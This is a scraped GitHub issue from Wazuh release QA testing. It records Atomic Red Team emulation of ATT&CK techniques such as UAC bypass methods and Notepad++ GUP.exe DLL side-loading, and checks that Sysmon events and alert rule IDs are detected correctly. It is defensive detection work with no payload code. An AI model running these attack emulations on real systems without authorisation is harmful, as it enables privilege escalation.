Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique

Event log

RuleName: technique_id=T1548.002,technique_name=Bypass User Access Control
win.eventdata.ruleName: technique_id=T1548.002,technique_name=Bypass User Access Control
{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"13","version":"2","level":"4","task":"13","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-18T15:49:05.1776583Z","eventRecordID":"7714","processID":"4508","threadID":"92","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Registry value set:\r\nRuleName: technique_id=T1548.002,technique_name=Bypass User Access Control\r\nEventType: SetValue\r\nUtcTime: 2022-07-18 15:49:05.173\r\nProcessGuid: {a64f3178-80f1-62d5-0606-000000009000}\r\nProcessId: 4724\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA\r\nDetails: DWORD (0x00000001)\r\nUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1548.002,technique_name=Bypass User Access Control","eventType":"SetValue","utcTime":"2022-07-18 15:49:05.173","processGuid":"{a64f3178-80f1-62d5-0606-000000009000}","processId":"4724","image":"C:\\\\Windows\\\\system32\\\\reg.exe","targetObject":"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA","details":"DWORD (0x00000001)","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}
RuleName: technique_id=T1548.002,technique_name=Bypass User Access Control
win.eventdata.ruleName: technique_id=T1548.002,technique_name=Bypass User Access Control

Dashboard event entry

T1574.002 – Hijack Execution Flow: DLL Side-Loading 🟢

GetPrereqs

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1574.002 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Attempting to satisfy prereq: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)
Prereq already met: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)

Test run

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1574.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Done executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary

Cleanup

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1574.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Done executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary

Event log

{"win":{"system":{"providerName":"Application Error","eventID":"1000","version":"0","level":"2","task":"100","opcode":"0","keywords":"0x80000000000000","systemTime":"2022-07-18T14:13:53.0245640Z","eventRecordID":"4206","processID":"0","threadID":"0","channel":"Application","computer":"EC2AMAZ-3188I1R","severityValue":"ERROR","message":"\"Faulting application name: GUP.exe, version: 5.1.1.0, time stamp: 0x5da631a5\r\nFaulting module name: GUP.exe, version: 5.1.1.0, time stamp: 0x5da631a5\r\nException code: 0xc0000409\r\nFault offset: 0x0000000000042de0\r\nFaulting process id: 0x196c\r\nFaulting application start time: 0x01d89ab09aae221f\r\nFaulting application path: C:\\AtomicRedTeam\\atomics\\T1574.002\\bin\\GUP.exe\r\nFaulting module path: C:\\AtomicRedTeam\\atomics\\T1574.002\\bin\\GUP.exe\r\nReport Id: 51d0d367-996f-43a3-9380-89ec88618fd6\r\nFaulting package full name: \r\nFaulting package-relative application ID: \""},"eventdata":{"data":"GUP.exe, 5.1.1.0, 5da631a5, GUP.exe, 5.1.1.0, 5da631a5, c0000409, 0000000000042de0, 196c, 01d89ab09aae221f, C:\\\\AtomicRedTeam\\\\atomics\\\\T1574.002\\\\bin\\\\GUP.exe, C:\\\\AtomicRedTeam\\\\atomics\\\\T1574.002\\\\bin\\\\GUP.exe, 51d0d367-996f-43a3-9380-89ec88618fd6"}}}

Dashboard event entry

roronoasins · 2022-07-19T09:24:40Z

Test that Windows data collection works out of the box. 🟢

After enabling logall and sending some Windows Events, we can see the logs immediately:

eventcreate /l system /id 666 /d RC1 /t information /so wazuh

2022 Jul 19 09:15:52 (EC2AMAZ-3188I1R) any->EventChannel {"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-19T09:15:51.8604866Z","eventRecordID":"12679","processID":"2064","threadID":"2860","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Process Create:\r\nRuleName: technique_id=T1086,technique_name=PowerShell\r\nUtcTime: 2022-07-19 09:15:51.847\r\nProcessGuid: {a64f3178-7647-62d6-cb00-000000009100}\r\nProcessId: 4804\r\nImage: C:\\Windows\\System32\\eventcreate.exe\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Event Create - Creates a custom event in an event log\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: evcreate.exe\r\nCommandLine: \"C:\\Windows\\system32\\eventcreate.exe\" /l system /id 666 /d RC1 /t information /so wazuh\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: EC2AMAZ-3188I1R\\Administrator\r\nLogonGuid: {a64f3178-736f-62d6-7b84-180000000000}\r\nLogonId: 0x18847B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C\r\nParentProcessGuid: {a64f3178-73b4-62d6-c500-000000009100}\r\nParentProcessId: 4796\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \r\nParentUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1086,technique_name=PowerShell","utcTime":"2022-07-19 09:15:51.847","processGuid":"{a64f3178-7647-62d6-cb00-000000009100}","processId":"4804","image":"C:\\\\Windows\\\\System32\\\\eventcreate.exe","fileVersion":"10.0.20348.1 (WinBuild.160101.0800)","description":"Event Create - Creates a custom event in an event log","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"evcreate.exe","commandLine":"\\\"C:\\\\Windows\\\\system32\\\\eventcreate.exe\\\" /l system /id 666 /d RC1 /t information /so wazuh","currentDirectory":"C:\\\\Users\\\\Administrator\\\\","user":"EC2AMAZ-3188I1R\\\\Administrator","logonGuid":"{a64f3178-736f-62d6-7b84-180000000000}","logonId":"0x18847b","terminalSessionId":"2","integrityLevel":"High","hashes":"SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C","parentProcessGuid":"{a64f3178-73b4-62d6-c500-000000009100}","parentProcessId":"4796","parentImage":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","parentCommandLine":"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"","parentUser":"EC2AMAZ-3188I1R\\\\Administrator"}}}

eventcreate /l application /id 666 /d RC1 /t warning /so wazuh-app

2022 Jul 19 09:21:25 (EC2AMAZ-3188I1R) any->EventChannel {"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-19T09:21:24.9668480Z","eventRecordID":"12715","processID":"2064","threadID":"2860","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Process Create:\r\nRuleName: technique_id=T1086,technique_name=PowerShell\r\nUtcTime: 2022-07-19 09:21:24.957\r\nProcessGuid: {a64f3178-7794-62d6-d300-000000009100}\r\nProcessId: 5096\r\nImage: C:\\Windows\\System32\\eventcreate.exe\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Event Create - Creates a custom event in an event log\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: evcreate.exe\r\nCommandLine: \"C:\\Windows\\system32\\eventcreate.exe\" /l application /id 666 /d RC1 /t warning /so wazuh-app\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: EC2AMAZ-3188I1R\\Administrator\r\nLogonGuid: {a64f3178-736f-62d6-7b84-180000000000}\r\nLogonId: 0x18847B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C\r\nParentProcessGuid: {a64f3178-73b4-62d6-c500-000000009100}\r\nParentProcessId: 4796\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \r\nParentUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1086,technique_name=PowerShell","utcTime":"2022-07-19 09:21:24.957","processGuid":"{a64f3178-7794-62d6-d300-000000009100}","processId":"5096","image":"C:\\\\Windows\\\\System32\\\\eventcreate.exe","fileVersion":"10.0.20348.1 (WinBuild.160101.0800)","description":"Event Create - Creates a custom event in an event log","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"evcreate.exe","commandLine":"\\\"C:\\\\Windows\\\\system32\\\\eventcreate.exe\\\" /l application /id 666 /d RC1 /t warning /so wazuh-app","currentDirectory":"C:\\\\Users\\\\Administrator\\\\","user":"EC2AMAZ-3188I1R\\\\Administrator","logonGuid":"{a64f3178-736f-62d6-7b84-180000000000}","logonId":"0x18847b","terminalSessionId":"2","integrityLevel":"High","hashes":"SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C","parentProcessGuid":"{a64f3178-73b4-62d6-c500-000000009100}","parentProcessId":"4796","parentImage":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","parentCommandLine":"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"","parentUser":"EC2AMAZ-3188I1R\\\\Administrator"}}}

roronoasins · 2022-07-19T15:25:10Z

Check that for the same Windows events, the alerts rule ID is the same as in previous version. 🟡

How this was checked

Using the same standard than previous Windows events check, a custom script that generates events has been used.

Generate custom events

python3 winevt_generator.py

Get the rule's ids from the generated Windows events

/var/ossec/bin/wazuh-logtest < /tmp/windows_events  2>&1 >/dev/null |  grep -E "id: '[0-9]*'" > X-Y-Z_rules_ids.txt

Compare with previous versions

Comparing the ids within the file, we verify that is identical than previous manual testing: 4.3.0, so the issue(Critical severity Windows rules 60012 and 60015 never trigger if the event is classified by channel. wazuh#12977) that was opened, still being an issue.
- 4.3.5:
  4-3-5_rules_ids.zip
  4-3-5_events.zip
- 4.3.6:
  4-3-6_rules_ids.zip
  4-3-6_events.zip

roronoasins added team/qa manual-testing dev-testing labels Jul 15, 2022

roronoasins added this to the Release 4.3.6 RC-1 milestone Jul 15, 2022

roronoasins self-assigned this Jul 15, 2022

roronoasins mentioned this issue Jul 15, 2022

Release 4.3.6 - Release Candidate 1 - E2E UX tests wazuh/wazuh#14260

Closed

1 task

jmv74211 removed the status/not-tracked label Jul 15, 2022

davidjiglesias closed this as completed Jul 20, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Release 4.3.6 - Release Candidate 1 - E2E UX tests - Windows events #3102

Release 4.3.6 - Release Candidate 1 - E2E UX tests - Windows events #3102

roronoasins commented Jul 15, 2022 •

edited

roronoasins commented Jul 18, 2022

T1053.005 – Scheduled Task/Job 🟢

T1218.010 – Signed Binary Proxy Execution: Regsvr32 🟢

T1518.001 – Software Discovery: Security Software Discovery 🟢

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control 🟢

T1574.002 – Hijack Execution Flow: DLL Side-Loading 🟢

roronoasins commented Jul 19, 2022 •

edited

roronoasins commented Jul 19, 2022 •

edited

Release 4.3.6 - Release Candidate 1 - E2E UX tests - Windows events #3102

Release 4.3.6 - Release Candidate 1 - E2E UX tests - Windows events #3102

Comments

roronoasins commented Jul 15, 2022 • edited

Test information

Test environments

4.3.5

4.3.6

Test description

Test report procedure

Reported issues to review

Conclusions 🟡

Issues

Detected issues and previously reported

Auditors' validation

roronoasins commented Jul 18, 2022

Emulation of ATT&CK techniques and detection with Wazuh

Setting up the lab environment

Sysmon configuration

Atomic Red Team installation

Attack emulation with ART

T1053.005 – Scheduled Task/Job 🟢

T1218.010 – Signed Binary Proxy Execution: Regsvr32 🟢

T1518.001 – Software Discovery: Security Software Discovery 🟢

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control 🟢

T1574.002 – Hijack Execution Flow: DLL Side-Loading 🟢

roronoasins commented Jul 19, 2022 • edited

Test that Windows data collection works out of the box. 🟢

roronoasins commented Jul 19, 2022 • edited

Check that for the same Windows events, the alerts rule ID is the same as in previous version. 🟡

How this was checked

roronoasins commented Jul 15, 2022 •

edited

roronoasins commented Jul 19, 2022 •

edited

roronoasins commented Jul 19, 2022 •

edited